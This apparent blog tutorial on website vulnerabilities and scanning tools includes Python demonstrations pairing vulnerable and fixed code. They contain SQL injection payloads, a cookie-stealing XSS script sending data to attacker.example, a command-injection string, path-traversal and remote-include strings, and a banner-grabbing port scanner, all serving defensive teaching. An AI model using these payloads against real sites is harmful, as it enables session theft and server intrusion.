Website Security 101: Fix Vulnerabilities in Your Website using the 9 best Tools to Scan for Vulnerabilities
Do you own any sort of website? Worried it might be hacked? Sooner or later somebody will try. But don't worry, in this article I will walk you through how you can protect your website from vulnerabilities and hackers.
Ever since the dawn of the internet, vulnerabilities and hackers have been a huge issue. Hackers look for vulnerabilities in any system they can exploit for profit.
Your website is no exception to such attacks. Suppose your website is compromised by such an attacker. In that case, much of your sensitive information could get stolen, and you could even end up losing your website!
In this article, we shall explore the most common vulnerabilities in 2021 that could compromise your website, how to detect them yourself, and how to eliminate them.
📑 Table of Contents
- The World of Vulnerabilities
- Website Vulnerabilities 101
- How to Attack a Website
- Be Your Own Vulnerability Analyst
- Vulnerability Scanners
- The Best 9 Vulnerability Scanners for Your Website!
A vulnerability is a flaw in the hardware or software of a computer system that a malicious third party can take advantage of to compromise it, usually for personal gain or profit.
No matter how carefully you configure and set up your system, it is bound to have a vulnerability somewhere.
Don't get upset with yourself just yet; a vulnerability is not always your fault as a user. It might exist because the manufacturer or vendor wasn't careful while designing, building or configuring the product.
If left unpatched, these vulnerabilities can cause a lot of trouble and severe damage to the system.
If you take a look at one of the most prominent ransomware cases in recent history, WannaCry, it spread through a vulnerability in the SMBv1 file-sharing component of the Windows OS. The flaw had been discovered by the US National Security Agency (NSA), which for years kept it to itself and built an exploit for it (EternalBlue) rather than reporting it to Microsoft.
All the WannaCry trouble started when this exploit was stolen from the NSA and published by the Shadow Brokers hacker group in April 2017. The WannaCry worm built on it the following month infected over 200,000 computers in over 150 countries and caused an estimated $4 billion in total losses. Microsoft had already shipped a patch (MS17-010) in March 2017; the victims were the machines that had not applied it.
Another example of a vulnerability from recent times is the Colonial Pipeline ransomware attack. While the attackers collected only $4.4 million in ransom (much of which was later recovered), the shutdown cost the company far more than that.
This attack did not need a software bug at all: it started with a compromised password for a VPN account that had no multi-factor authentication, a vulnerability in its own right caused by a lack of proper oversight.
In short, a vulnerability allows a hacker to gain access to any system, gather sensitive information and make a profit for themselves. The more vulnerabilities your system has, the more likely you will be hacked, no matter how insignificant you might think you are.
The easiest way a hacker can gain access to your sensitive information is through a vulnerable website that stores this information. It might be a social media website, a shopping website or even a personal website that you host.
While the security of the shopping or social media websites isn’t in your control, that of your personal websites is in your hands.
With almost 1.8 billion websites on the internet, they can be broadly categorised into 3 types:
- Hand-Coded websites are created the old-fashioned way with a text editor, HTML and a bit of CSS. This is probably the first website you ever created while you were a kid in high school.
- Websites built using the various builder tools available online. Early on these didn't have a lot of functionality and existed mainly to get more people into web design.
- Finally, we have modern CMS-based websites. CMS stands for Content Management System with advanced tools and features that allow a user to create a website with minimal effort and a lot of functionality.
Due to the time-consuming nature of the hand-coded websites and the lack of functionality for the website builder tool, CMS-based websites are far more common these days.
But even so, hand-coded websites aren't entirely obsolete. The code of a popular CMS is public, and so are its vulnerabilities: once a flaw is found in a CMS or a widely used plugin, every site running that version has it, and attackers scan for and exploit those sites in bulk.
A hand-coded site has no such shared flaw, so an attacker needs targeted, in-depth research to find its bugs. That is not the same as having fewer bugs; it just means that you, rather than the public, have to find them, which is what the rest of this article is about.
A website can be attacked to exploit various different resources, sometimes to gain access to the server running it, and sometimes to extract information from databases. Let us look at a few of these attacks in the next section.
A malicious third party may attack your website for various reasons. Maybe a vulnerability was found in the CMS you use and you were swept up in the bulk of users attacked. Perhaps you were targeted by someone who wants to steal your identity. Or, least likely of all, you were on a government watchlist and they decided to take you out.
Paranoia is a key factor in fighting hackers by preparing for the worst-case scenario.
But let's not go off-topic. If your website has any vulnerabilities, it will fall victim to a malicious attack sooner or later unless they are patched.
Attacks against a website may come in various shapes and sizes; I have listed a few of my personal favourites and the most popular below.
As a database enthusiast, SQL injection is my favourite vulnerability or attack against a website.
An SQL injection is an attack executed by entering specially crafted input into a text box, form field or URL parameter that your website feeds into a database query. If your backend builds the query by pasting that input into the SQL text instead of binding it as a parameter, the input becomes part of the query itself, and the database will return (or modify) data the attacker was never meant to reach.
A good attacker anticipates the layout of your database from common field and table names (users, password, email) and enters a query that returns that data. Many databases also expose their own schema to any query (information_schema in MySQL, sqlite_master in SQLite), so the guessing is often unnecessary.
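To make this concrete, here is an added example, written for this article rather than taken from the original page or any particular site. It uses Python's built-in sqlite3 module with a constructed two-user table; the table name, the sample records and the two payloads are assumptions made for the demonstration. The vulnerable lookup pastes the input into the SQL text, the safe one binds it as a parameter, and the second payload shows how the schema itself can be read instead of guessed:

```python
import sqlite3

# Constructed sample database (not from the article) so the example runs offline.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email) VALUES (?, ?)",
        [("alice", "alice@example.com"), ("bob", "bob@example.com")],
    )
    return conn

def lookup_vulnerable(conn, username):
    # The input is pasted into the SQL text, so quotes and keywords in it
    # become part of the query instead of part of the value.
    sql = "SELECT username, email FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, username):
    # Parameterised query: the value is bound separately from the statement,
    # so no input can change the query's structure. Every SQL driver has this.
    return conn.execute(
        "SELECT username, email FROM users WHERE username = ?", (username,)
    ).fetchall()

# Classic tautology: the WHERE clause becomes always-true and every row comes back.
DUMP_ALL = "' OR '1'='1"
# UNION payload reading the schema: the attacker no longer has to guess table
# and column names. The trailing -- comments out the closing quote.
READ_SCHEMA = "' UNION SELECT name, sql FROM sqlite_master --"

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, DUMP_ALL))     # both users
    print(lookup_vulnerable(db, READ_SCHEMA))  # the CREATE TABLE statement
    print(lookup_safe(db, DUMP_ALL))           # [] : treated as a literal name
```

The UNION payload only works because the attacker matched the column count (two) of the original SELECT; in practice they find that count by trial, which is exactly the kind of probing sqlmap automates later in this article.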
While SQL injection is targeted at your website itself, Cross-Site Scripting (XSS) targets your website's visitors. This will be quite a problem if you own a popular website with a steady stream of visitors.
Like SQL injection, XSS operates through input fields, but instead of database queries the hacker injects script. If the input isn't sanitised (more precisely, output-encoded for the place on the page where it lands), the script runs in the visitor's browser.
The browser has no way to tell a script the site intended from one an attacker injected into the page; both arrive in the same HTML from the same origin, so it runs them with the same access to the visitor's session.
An XSS script can be easily used to hijack a user session or session data, such as login information or other sensitive data/messages. I don't have to explain to you how a hacker can misuse such data, do I?
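As an added example (not code from the original page), here is a stored-XSS scenario in Python: a constructed comment list containing a cookie-stealing payload, a renderer that drops comments straight into the HTML, and one that output-encodes them with html.escape. The comment text, the attacker host name and the attribute-context payload are all assumptions made for the demonstration:

```python
import html

# Constructed sample comment store (not from the article). The second entry is a
# stored-XSS payload: it runs in every visitor's browser and sends their cookie off-site.
COMMENTS = [
    "Great post!",
    "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>",
]

def render_vulnerable(comments):
    # User input is dropped straight into the HTML: the browser cannot tell
    # the injected <script> from one the site shipped, so it runs it.
    return "<ul>" + "".join("<li>" + c + "</li>" for c in comments) + "</ul>"

def render_safe(comments):
    # Output-encode for the HTML body context: < > & " ' become entities and
    # the browser shows the payload as text instead of executing it.
    return "<ul>" + "".join("<li>" + html.escape(c) + "</li>" for c in comments) + "</ul>"

def link_safe(title):
    # Attribute context needs the quote characters escaped too (quote=True);
    # otherwise a value like  " onmouseover="alert(1)  breaks out of the attribute
    # and adds an event handler of the attacker's choosing.
    return '<a title="' + html.escape(title, quote=True) + '">link</a>'

def contains_live_script(page):
    # Crude check: an unescaped <script tag survived rendering.
    return "<script" in page.lower()

if __name__ == "__main__":
    print(contains_live_script(render_vulnerable(COMMENTS)))  # True
    print(contains_live_script(render_safe(COMMENTS)))        # False
    print(link_safe('" onmouseover="alert(1)'))
```

Encoding is context-specific: what is safe inside an element body is not automatically safe inside an attribute, a URL or a script block. Marking the session cookie HttpOnly limits what a payload like the one above can steal even if encoding is missed somewhere.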
Command injection is, in my opinion, one of the two most dangerous attacks that can be carried out against any website, since it can hand a hacker the entire server with ease.
It arises wherever the application passes user-controlled input (form fields, cookies, HTTP headers) into an operating-system command without validating or escaping it, and the server executes whatever the input contains.
The attacker only has to find out what operating system and shell the server runs, which is usually easy to discover from public information, and then appends the shell's command separators (; | && $( ) and so on) followed by whatever command they want executed.
Using command injection, a hacker can take over an entire website by owning its server, gather all the information stored on it, and enlist the server into a botnet for future attacks.
This attack is quite often overlooked by server admins, who might not take proper action to prevent them.
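Here is an added example (written for this article, not taken from the original page) of the pattern in Python's subprocess module. A diagnostic page that "checks" a hostname is assumed; echo stands in for the real tool (ping, nslookup, whois) so that the example runs anywhere, and the injection works identically with those. The vulnerable version hands the whole string to a shell; the safe one validates the hostname and passes it as a single argument with no shell at all:

```python
import re
import subprocess

# Hostnames must start with a letter or digit. Requiring that first character
# also blocks option injection ("-n", "--help") into the command we spawn.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")

def diag_vulnerable(host):
    # shell=True hands the entire string to /bin/sh, which honours ; | && $( )
    # and friends inside the user-supplied part.
    return subprocess.run("echo checking " + host, shell=True,
                          capture_output=True, text=True).stdout

def diag_safe(host):
    if not HOSTNAME_RE.fullmatch(host):
        raise ValueError("rejected hostname: %r" % host)
    # argv list, no shell: the hostname arrives as one argument and is never
    # parsed for metacharacters by anything.
    return subprocess.run(["echo", "checking", host],
                          capture_output=True, text=True).stdout

def is_rejected(host):
    try:
        diag_safe(host)
        return False
    except ValueError:
        return True

# Constructed attacker input: the separator ends our command and starts theirs.
INJECTION = "example.com; echo INJECTED"

if __name__ == "__main__":
    print(diag_vulnerable(INJECTION), end="")  # checking example.com / INJECTED
    print(diag_safe("example.com"), end="")    # checking example.com
    print(is_rejected(INJECTION))              # True
```

Validation alone is not enough if you still build a shell string; the list form is what removes the shell from the picture, and the allow-list regex is there to stop arguments the tool itself would misinterpret.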
File Inclusion vulnerability takes advantage of the server-side scripting language running the website by making the code import a file specified by the attacker. This file could be hosted by the attacker remotely (Remote File Inclusion or RFI) or be available on the server itself (Local File Inclusion or LFI).
Let me explain a simple example. Consider a server with PHP as its server-side scripting language. PHP uses include (and require) to pull another file's code into the running script, typically libraries of functions.
If the file name passed to include comes from a non-sanitised input field or URL parameter, an attacker can point it at a file of their own choosing, and PHP will interpret that file as code and execute it: a local file reached through ../ path traversal (LFI), or, if the allow_url_include setting is on, a file hosted on the attacker's own server (RFI).
Image Source – imperva.com
When I said that command injection is one of the two most dangerous website attacks, file inclusion is the other.
This vulnerability allows an attacker to take over the server along with the website, serve malicious payloads to visitors, and tamper with anything the site sends them, including the cookies it sets on every visitor's system.
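The defence is the same in every language: never let input name a file directly, or if you must, resolve the path and confirm it stays inside the directory you meant. The following added example (not from the original page) shows both in Python; the include directory, its single home.html page and the attacker paths are constructed for the demonstration:

```python
import tempfile
from pathlib import Path

# Strongest option: an allow-list mapping a page name to a file. Input never
# names a file at all. (Constructed map for the example.)
PAGES = {"home": "home.html", "about": "about.html"}

def resolve_allowlisted(base_dir, page):
    if page not in PAGES:
        raise ValueError("unknown page")
    return Path(base_dir).resolve() / PAGES[page]

def resolve_include(base_dir, requested):
    """Return an absolute path under base_dir for `requested`, or raise ValueError."""
    # RFI: refuse anything that looks like a URL (http://, ftp://, protocol-relative //).
    if "://" in requested or requested.startswith("//"):
        raise ValueError("remote inclusion refused")
    base = Path(base_dir).resolve()
    # Joining an absolute path replaces base entirely (/etc/passwd), and ../
    # climbs out of it; resolve() normalises both before the containment check.
    target = (base / requested).resolve()
    try:
        target.relative_to(base)
    except ValueError:
        raise ValueError("path escapes include directory") from None
    return target

def demo():
    # Constructed include directory (not from the article) so the example runs offline.
    with tempfile.TemporaryDirectory() as d:
        Path(d, "home.html").write_text("<h1>home</h1>")
        results = {}
        for req in ["home.html", "../../etc/passwd", "/etc/passwd",
                    "http://attacker.example/shell.txt"]:
            try:
                results[req] = resolve_include(d, req).read_text()
            except (ValueError, FileNotFoundError) as e:
                results[req] = "refused: " + type(e).__name__
        return results

if __name__ == "__main__":
    for request, outcome in demo().items():
        print(request, "->", outcome)
```

Note that the check compares resolved paths, so symlinks inside the include directory that point outside it are also caught, which a plain string check for ".." would miss.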
Well, port scanning is technically not a website attack but is a form of reconnaissance performed to gather details of the ports on a server hosting a website.
I included it here simply because of how easily it lets an attacker gather information about the server: which services are listening, what software and versions they run, what kind of authentication they require, and whether any of them can be reached without a password.
If a service on the server is running a version with a known vulnerability, the hacker can find dozens of tools and exploits online to take advantage of it.
The port scan itself is only reconnaissance, but what it finds is what makes it dangerous: an exposed, vulnerable service is what the attacker then exploits to get a reverse shell on the server and run whatever commands they like. A port scan is noisy and can be detected; the exploitation that follows a successful one is much harder to spot unless you are looking for it.
Port scans pay off most against servers with no firewall limiting which ports are reachable, and with services that have known exploits listening on them.
There's no point in understanding the various attacks on your website if you can't do anything to prevent them yourself, and not everyone can afford a penetration tester to look at their website and find vulnerabilities.
Even though I can't turn you into a world-renowned cybersecurity analyst in the course of this article, I can point you in the right direction with a few tips and pointers.
Well, the best way to see if you are running a website with vulnerabilities is to attack your own website. And by attack yourself, I mean sit down with a computer and some groovy music playing in the background, and manually test for every vulnerability that your website may have.
I would ask you to try this only if you host your own website and not if any CMS is involved. Also, it might be a good idea to do this only if you have a bit of experience in networking and such.
While we don’t have to go into actual attacks, by sending any payloads, we sure can make do with a bit of reconnaissance against your website.
Netcraft is an online service that allows you to gather all open-source information available relating to any domain address that you want. I always use Netcraft first while performing any sort of reconnaissance since it gives you a general idea of the website.
The information Netcraft provides includes the registrar, WHOIS details, the hosting provider and netblock, and the server software and technologies it has fingerprinted on the site.
To check this information, simply visit the Netcraft website and enter your website address in the search bar. When results are returned, just make sure that none of your personal information is shown here when you search for your website.
Other websites that you can use for similar functions are Shodan or Censys, but I prefer Netcraft as it is easier to understand and it is also free.
Remember the port scanning I mentioned in the previous section? Nmap is the tool for it. You can use it to find every open port, and the service running behind it, on any computer system you are authorised to scan.
Once the scan is complete (for example nmap -sV your-server, which also reports service versions), you can see which services are reachable from the outside. Take each service and version to an exploit database, such as Exploit-DB or Rapid7, and check whether any working exploits exist for it.
If there are none, you're good for now. If there are, update the service to a patched version, or, if it doesn't need to be reachable from the internet, close it off behind a firewall.
Nmap is free and runs on Linux, Windows and Mac; install it locally rather than relying on an online scanner, and only point it at systems you own or have written permission to test.
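To show what a port scan actually does, and what the "service and version" you take to an exploit database looks like on the wire, here is an added example in Python (written for this article; it is not Nmap's code and not from the original page). It performs a TCP connect scan and grabs the banner each open port announces. To run offline it starts a constructed stand-in service on a random localhost port that answers with a made-up SSH banner; the banner text and the ports are assumptions for the demonstration. It is deliberately minimal next to Nmap, which also handles UDP, OS fingerprinting and timing:

```python
import socket
import threading

def scan(host, ports, timeout=0.5):
    """TCP connect scan: returns {port: banner} for every port that accepted a connection."""
    found = {}
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) != 0:   # refused, filtered, or timed out
                continue
            # Many services (SSH, SMTP, FTP) announce themselves on connect; that
            # version string is what you look up in Exploit-DB afterwards.
            try:
                banner = s.recv(128).decode(errors="replace").strip()
            except socket.timeout:
                banner = ""
            found[port] = banner
    return found

def _fake_service(banner):
    # Constructed stand-in for a real listener (not from the article): binds an
    # ephemeral localhost port and answers one connection with the given banner.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        conn.sendall(banner)
        conn.close()
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port

def _free_port():
    # Reserve-then-release a port so we have one that is (almost certainly) closed.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]

def demo():
    open_port = _fake_service(b"SSH-2.0-OpenSSH_7.4\r\n")  # constructed banner
    closed_port = _free_port()
    return {
        "open_port": open_port,
        "closed_port": closed_port,
        "found": scan("127.0.0.1", [closed_port, open_port]),
    }

if __name__ == "__main__":
    result = demo()
    print("open:", result["found"])      # {<port>: 'SSH-2.0-OpenSSH_7.4'}
    print("closed:", result["closed_port"], "not listed")
```

A scan like this is exactly what an attacker sees, which is the point of running it against your own server first: anything that answers with a version string is a candidate for an exploit-database lookup, and anything that does not need to be reachable should not answer at all.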
There are a few more manual methods in which you can "Attack" your own website to find vulnerabilities like SQL injection, XSS scripts and more. But since they are pretty complicated concepts, I wouldn't want to overcrowd your brain with them.
We dealt with hand-coded websites in the previous section, and yes, those methods can be extended to the CMS-based ones as well. But CMS-based websites have additional problems that you would need to deal with.
If you are running your website on a CMS-based system such as WordPress, Squarespace, Joomla, Wix etc., you have the vulnerability of the CMS system itself to worry about. According to various market statistics WordPress, Joomla, Drupal etc., are some of the most popular CMS systems currently.
If you use one of these 3 CMS systems, let's look at a few ways to detect vulnerabilities in your websites.
The 4 top vulnerability scanners for WordPress are – WPXF, WPScan, WPSeku, and WPForce. Of the 4 available ones, my personal favourite and the most popular scanner is the WPScan.
WPScan lets you scan your WordPress website: it identifies the WordPress version you're running, enumerates installed plugins and themes along with known vulnerabilities in them, finds exposed directories and user names, and can run a password brute-force against the login to show how weak your credentials are.
WPScan works from the WPScan vulnerability database, which tracks known WordPress core, plugin and theme vulnerabilities and currently contains more than 21,850 entries.
However, there are a few issues with the scanner from my personal experience. Firstly, WPScan's options and controls are a bit complicated and could be more user-friendly.
Secondly, even though the whole scanner is quite fast, the plugin scanner itself takes a long time to complete.
Here too, there are quite a few different scanners available, but my choice for Joomla would be the JoomScan. It was created by the Open Web Application Security Project (OWASP) and is very similar to the WPScan tool we looked at earlier.
The one thing I found quite helpful in the JoomScan tool was its ability to pinpoint outdated versions running on the website and even provide a link to their exploits.
You can use JoomScan to detect any file misconfigurations, detect firewalls and security protocols, as well as enumerating Joomla components installed along with their version.
The one feature missing from this tool is the ability to Brute force admin logins, which is, however, not very important. I found that most Joomla websites use a powerful plugin known as Stop Brute Force which prevents any attempts.
Other common Joomla scanners include JoomlaVS and JScanner.
The Drupal vulnerability scanner that I will explain is called DroopeScan. This is actually one of the only scanners available for Drupal and is not quite as good as the scanners in the previous sections.
To start off, DroopeScan is quite basic in every sense of the term: it gathers only basic information (version, plugins, themes) about a Drupal website. Some of that information might already be openly available on the internet through tools such as Netcraft, Shodan etc.
However, you can take the details DroopeScan returns to any exploit database and look up whether vulnerabilities exist for your version and whether exploits are available for them.
To be honest, I believe the lack of a proper vulnerability scanner for Drupal comes down to its smaller market share; there simply aren't as many websites running Drupal.
Unfortunately, there aren’t many other website scanners for CMS systems out in the market which actually function well. Also, since most websites run WordPress anyway, most scanners available support WordPress instead.
One drawback that most people might find with a CMS scanner is that even though they’re all freeware, they do require a Linux OS to run. But I’ve got a solution for that too.
If you don’t have a Linux system, just download any virtualisation software off the internet. I personally prefer VirtualBox for its myriad of features and customisability. You then simply need to download a Linux Image (Kali Linux preferably) and install it onto the virtualisation software.
Voila! You have your very own Linux OS to run scanners in! I recommend using Kali Linux because it is customised to be used for such operations and sometimes comes with such scanners pre-installed.
Finally, I would also suggest you keep yourself informed about any vulnerability that was discovered in the CMS system as this might be cause for a bulk hack of all websites running the same CMS. Such vulnerabilities can't be fixed by you, but you can take a few precautions to avoid getting targeted.
Well, being the busy bee you are, you might not always have the time and patience to sit down and manually find the vulnerabilities on your website or even be bothered with the CMS scanners.
Automated Vulnerability Scanners exist just for people like this, even you and me. These scanners aggressively scan your web server or web applications for any and every vulnerability that requires your attention.
These scanners will also find any outdated versions running on your website and report them to you or even sometimes link you to an exploit for its vulnerability. They mainly function using known vulnerabilities available on exploit databases and checking the system you run against these databases.
However, in my experience, none of these scanners uncovers any 0-day vulnerabilities in your system. That task is still up to you or a penetration tester.
Most of these scanners do perform black-box testing as well, so you don’t need to be worried about the code or internal mechanics of your web server or applications.
I will explore Automated Vulnerability Scanners in detail in the upcoming sections.
If all else fails, you pretty much don't have any other choice when it concerns your website. Yes, this option is a bit too far-fetched for a regular user. But if your website is your primary source of income and you have a lot of sensitive data that you could lose in a website hack, you pretty much need help.
Mind you, I don’t recommend hiring a professional if you are a part-time blogger running a WordPress website. You can find vulnerabilities with your website yourself, and it wouldn't be cost-efficient for you to hire a professional.
A professional penetration tester will use various tools and software to analyse your website, web server and web applications to find any vulnerabilities that may exist. They will also test known exploits to see whether those vulnerabilities are actually exploitable.
The penetration tester will then submit a report of all findings along with their suggestions on how you can remove the vulnerabilities and improve the security of your website by minimising future risks.
One positive aspect of hiring a professional penetration tester is that they will also look for previously unknown (0-day) vulnerabilities in your own code, which no automated scanner will find. But mind you, such services are considerably more expensive.
I would ask you to hire a penetration tester only if your website and the profit from it is worth at least twice as much as the cost incurred for a penetration tester. Otherwise, it is simply not worth it.
The key purpose of an automated vulnerability scanner is to find all vulnerabilities in a system and prevent any malicious actor from exploiting these vulnerabilities to cause any damage to the system or extract any sensitive data.
Website Vulnerability Scanners perform the same function but are generally targeted to scan web applications and web servers that run the website.
There are mainly 4 types of vulnerability scanners:
- Cloud-Based Vulnerability Scanners – used to find vulnerabilities in cloud-based systems like web applications
- Host-Based Vulnerability Scanners – used to find vulnerabilities on an individual system or a network device such as a router
- Network-Based Vulnerability Scanners – used to find vulnerabilities in an entire network and scans all ports to find any vulnerable services that might be running
- Database-Based Vulnerability Scanners – used to find vulnerabilities in database management systems that usually form the backbone of any system storing all system-related data
Even though vulnerability scanner tools are usually used in a corporate environment, they are more than suited for personal uses due to their ease of use and simplicity. Although, it is a general rule to have a basic understanding of network security and vulnerabilities while using such a tool so that you can understand the results and don’t have to google everything.
Now, let’s look at a few of the best vulnerability scanners for your website.
OpenVAS is my go-to vulnerability scanner while dealing with any system, be it a web server or an individual computer system. I never begin a penetration test without running OpenVAS once.
It is very user friendly and doesn't need a lot of time to learn. You could just install it and immediately start using it with no trouble or additional plugin requirements.
OpenVAS supports large scale scans of an entire organisation’s network and is quite efficient as well as accurate when it comes to discovering vulnerabilities.
With almost 80,000 different vulnerability tests, OpenVAS covers SQL injection, Cross-Site Scripting, authenticated and unauthenticated testing, and even industrial-scale performance tuning. Remember the different vulnerabilities/attacks we looked at earlier? OpenVAS can detect every single one of them; preventing them is still up to you, guided by its report.
It also suggests measures to eliminate vulnerabilities as well as helps in risk assessment of your system. Finally, it also receives updates almost every day, thereby keeping it at the top of its game.
While Nmap isn't an automated vulnerability scanner like OpenVAS, it is on this list because of how versatile it is as a reconnaissance tool. It is also easy to use, making it a good choice for beginners. It was the first security scanner I ever used, and I still use it.
A basic Nmap scan probes a network to find hosts, the services running on them and, with -O, the operating systems they run. With only that information, you'd have to search exploit databases yourself to find vulnerabilities.
The Nmap Scripting Engine (NSE) closes that gap: the scripts run by --script vuln check the detected services against known vulnerabilities, and -sV reports the exact software versions so outdated ones stand out. Nmap also adapts its timing to the latency and congestion of the network it is scanning.
While it was initially released only for Linux, it is now available for Windows and Mac as well.
The only issue I have with Nmap is that it is fundamentally a terminal tool; a GUI front end (Zenmap) exists, but the real work still happens in a command window, which might be a bit dull to use.
SQLMap isn’t your typical vulnerability scanner that scans your entire system for vulnerabilities; it is a database scanner tool that is specifically made to find vulnerabilities in your database system.
Since a database forms the backbone of any website and stores all the sensitive information pertaining to it, securing the database ensures that the damage from an attack is mitigated to a good extent.
SQLMap is an open-source penetration testing tool that allows you to automate the entire SQL injection process for the database used by your website. It supports six different types of SQL injection techniques, namely – time-based blind, UNION query, stacked queries, Boolean-based blind, error-based, and out-of-band.
It also supports a variety of database servers such as MySQL, SQL Server, Oracle, SQLite etc.
Sucuri is a quite popular malware and security scanner for your web server as well as web applications.
Sucuri offers vulnerability testing against a lot of exploits such as SQL injections, XSS scripts, tests for malware on the webserver and more.
It also offers a paid version that works as a security system for your website, offering an incident response, protection against hacks such as DDoS, improved page loading speed etc. But at $199/month, this service is too expensive for us regular users.
To scan your website, you simply have to visit the Sucuri online website and enter your website address to gather all the details about your vulnerabilities.
The one thing I like about Sucuri is that it not only works with your in-house website but can also scan for vulnerabilities on any CMS-based systems such as WordPress, Joomla, Magento etc.
Intruder is a vulnerability scanner specifically designed for cloud-based environments. It can scan your web applications and any CMS systems that you use for your website.
It also prioritises results for you based on their context. The main functions of the Intruder vulnerability scanner include detecting out-of-date versions, uninstalled patches, any misconfigured settings, SQL injection and XSS script possibilities and also any issues that may exist in the CMS system running on your website.
Even though most of the functionalities are available in the free-trial, it only lasts 30 days. The paid version starts at $97/month, which, while is less expensive than Sucuri, is still quite costly for a regular user.
A tip I would suggest is to use the trial to get a thorough baseline scan of your site, fix what it finds, and then keep up the routine with the free tools on this list once it expires.
Coming back to the world of free vulnerability scanners, Grabber is a vulnerability scanner that solely works to find vulnerabilities in any web applications that you run on your website. One thing that I have to tell you before everything is that, even after extended use, I found this scanner to be a bit slower than most others on this list.
But what redeems the Grabber Vulnerability scanner is its versatility, portability and simplicity, even with the lack of a proper GUI. I have put this tool on this list purely as a recommendation for personal use and nothing else.
What I found interesting is that being open-source, you can go and edit the source code, which is in python, to add new functionalities. For a seasoned programmer or network engineer, this is an outstanding feature.
In terms of vulnerability detection, it can find Cross-Site Scripting, SQL Injection and File Inclusion, perform simple source-code analysis, and test Ajax and JavaScript. This is where the versatility of the tool makes up for its overall speed.
In short, this tool can do a lot of things but at a slow pace which, in my books, is a decent trade-off.
I wouldn’t write this list without one of the only crowdsourced vulnerability scanners in the market. Created for ethical hackers by ethical hackers is the most fantastic feature of Detectify.
The tool can perform web server and application scans for your website along with an asset monitoring system and can identify over 1500 different vulnerabilities. The asset monitor mainly exists to continually scan sub-domains and directories for any slight chance of a breach by malicious parties.
However, the scanner is a paid one with only 2 weeks of free-trial. I wouldn’t recommend the scanner unless you don’t mind spending around $85/month for the basic version of the tool.
You could easily get most of the functionalities offered by this tool with many of the free scanners that I listed earlier in the section.
Nikto2 is yet another vulnerability scanner that works primarily on web applications. Being an open-source project, Nikto2 is freeware, and the source code can be customised according to your needs.
But the reason Nikto2 makes this list is the sheer volume of checks it runs: around 6700 potentially dangerous files and programs, plus outdated versions of well over a thousand server products. Its check database is updated frequently, so newly disclosed issues are picked up quickly; as with every scanner here, it tests for known issues, not 0-days.
The most common functionalities include detecting misconfigurations, outdated software versions, as well as alert on server configuration issues. The scanner can also do quick scans to detect any vulnerabilities.
One issue I had with this scanner, however, is the lack of any system that suggests measures to eliminate the vulnerabilities or improve the overall security of the system.
Netsparker, even though the last entry on the list, is by no means any less of a vulnerability scanner in the market. Being specialised for web applications, Netsparker can virtually scan thousands of web applications for vulnerabilities within only a few hours. This speed is rarely available in any other such tools.
The scanner also has a crawler system that can crawl a web application in order to find a vulnerability, and this makes the entire system quite thorough and efficient.
Netsparker also gives suggestions as to how to eliminate vulnerabilities and improve security as well as mitigate any damage caused by an attack on the website.
The only reason for which I've put this at the end of the list simply is that it is built mainly for enterprise clients and is also a paid tool.
Summing up, I would say that a vulnerability on any system, no matter how secure, will definitely exist. And if this vulnerability exists on a website, it is especially worse due to all the additional remote attacking capabilities that open up.
We looked at quite a few such website vulnerabilities and how you can take on the task of finding them yourself while improving the security of your website. At the end of the day, it doesn't matter which method you choose to enhance your website security. As long as you are thorough, it should do the job.
If you liked this article or want to add any new information or vulnerability scanner tool, please leave a comment below and let us know!